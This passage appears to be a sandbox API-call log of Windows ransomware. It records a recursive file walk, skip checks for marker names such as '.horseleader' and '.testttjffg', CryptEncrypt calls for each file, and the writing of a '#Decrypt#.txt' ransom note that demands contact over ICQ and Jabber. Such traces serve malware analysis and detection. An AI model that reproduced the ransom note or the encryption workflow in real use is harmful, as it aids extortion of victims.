nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="symbols", cAlternateFileName="")) returned 1 [0233.717] lstrcmpiW (lpString1="symbols", lpString2="Windows") returned -1 [0233.717] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 76 [0233.717] lstrcmpW (lpString1="symbols", lpString2=".") returned 1 [0233.717] lstrcmpW (lpString1="symbols", lpString2="..") returned 1 [0233.717] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.717] GetProcessHeap () returned 0x780000 [0233.717] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.717] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*") returned 78 [0233.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.718] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.718] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\.") returned 78 [0233.718] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.718] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.718] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.718] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\..") returned 79 [0233.718] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0233.718] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.718] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0233.718] lstrcmpiW (lpString1="ea-sym.xml", lpString2="Windows") returned -1 [0233.718] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 87 [0233.718] StrStrIW (lpFirst="ea-sym.xml", lpSrch=".horseleader") returned 0x0 [0233.718] lstrcmpW (lpString1="ea-sym.xml", lpString2="#Decrypt#.txt") returned 1 [0233.718] lstrcmpW (lpString1="ea-sym.xml", lpString2="_uninstalling_.png") returned 1 [0233.719] lstrlenW (lpString=".testttjffg") returned 11 [0233.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpSrch=".testttjffg") returned 0x0 [0233.719] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.719] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.719] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0233.719] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="Windows") returned -1 [0233.719] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 90 [0233.719] StrStrIW (lpFirst="ja-jp-sym.xml", lpSrch=".horseleader") returned 0x0 [0233.719] lstrcmpW (lpString1="ja-jp-sym.xml", lpString2="#Decrypt#.txt") returned 1 [0233.719] lstrcmpW (lpString1="ja-jp-sym.xml", lpString2="_uninstalling_.png") returned 1 [0233.719] lstrlenW (lpString=".testttjffg") returned 11 [0233.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpSrch=".testttjffg") returned 0x0 [0233.720] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.720] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.763] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0233.763] lstrcmpiW (lpString1="symbase.xml", lpString2="Windows") returned -1 [0233.763] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 88 [0233.763] StrStrIW (lpFirst="symbase.xml", lpSrch=".horseleader") returned 0x0 [0233.763] lstrcmpW (lpString1="symbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.763] lstrcmpW (lpString1="symbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.763] lstrlenW (lpString=".testttjffg") returned 11 [0233.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.763] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="symbase.xml", cAlternateFileName="")) returned 0 [0233.763] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.764] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\#Decrypt#.txt") returned 90 [0233.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.764] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.764] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.766] lstrlenA (lpString="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") returned 1368 [0233.766] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.766] CloseHandle (hObject=0x1a4) returned 1 [0233.766] GetProcessHeap () returned 0x780000 [0233.766] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.766] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0233.766] lstrcmpiW (lpString1="symbols.xml", lpString2="Windows") returned -1 [0233.766] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 80 [0233.766] StrStrIW (lpFirst="symbols.xml", lpSrch=".horseleader") returned 0x0 [0233.766] lstrcmpW (lpString1="symbols.xml", lpString2="#Decrypt#.txt") returned 1 [0233.766] lstrcmpW (lpString1="symbols.xml", lpString2="_uninstalling_.png") returned 1 [0233.766] lstrlenW (lpString=".testttjffg") returned 11 [0233.766] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpSrch=".testttjffg") returned 0x0 [0233.767] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.767] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.802] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="web", cAlternateFileName="")) returned 1 [0233.802] lstrcmpiW (lpString1="web", lpString2="Windows") returned -1 [0233.802] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned 72 [0233.802] lstrcmpW (lpString1="web", lpString2=".") returned 1 [0233.802] lstrcmpW (lpString1="web", lpString2="..") returned 1 [0233.802] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.802] GetProcessHeap () returned 0x780000 [0233.802] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7dd078 [0233.802] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*") returned 74 [0233.802] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.851] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.851] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\.") returned 74 [0233.851] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.851] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.851] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.851] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\..") returned 75 [0233.851] lstrcmpW (lpString1="..", lpString2=".") returned 
1 [0233.852] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.852] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="webbase.xml", cAlternateFileName="")) returned 1 [0233.852] lstrcmpiW (lpString1="webbase.xml", lpString2="Windows") returned -1 [0233.852] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml") returned 84 [0233.852] StrStrIW (lpFirst="webbase.xml", lpSrch=".horseleader") returned 0x0 [0233.852] lstrcmpW (lpString1="webbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.852] lstrcmpW (lpString1="webbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.852] lstrlenW (lpString=".testttjffg") returned 11 [0233.852] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.852] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.852] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.864] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="webbase.xml", cAlternateFileName="")) returned 0 [0233.864] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.868] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\#Decrypt#.txt") returned 86 [0233.868] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.869] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.869] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.871] lstrlenA (lpString="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") returned 1368 [0233.871] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.871] CloseHandle (hObject=0x1a4) returned 1 [0233.871] GetProcessHeap () returned 0x780000 [0233.871] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.871] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="web.xml", cAlternateFileName="")) returned 1 [0233.871] lstrcmpiW (lpString1="web.xml", lpString2="Windows") returned -1 [0233.871] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 76 [0233.871] StrStrIW (lpFirst="web.xml", lpSrch=".horseleader") returned 0x0 [0233.871] lstrcmpW (lpString1="web.xml", lpString2="#Decrypt#.txt") returned 1 [0233.872] lstrcmpW (lpString1="web.xml", lpString2="_uninstalling_.png") returned 1 [0233.872] lstrlenW (lpString=".testttjffg") returned 11 [0233.872] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\fsdefinitions\\web.xml", lpSrch=".testttjffg") returned 0x0 [0233.872] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.872] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.872] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="web.xml", cAlternateFileName="")) returned 0 [0233.872] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.872] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\#Decrypt#.txt") returned 82 [0233.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 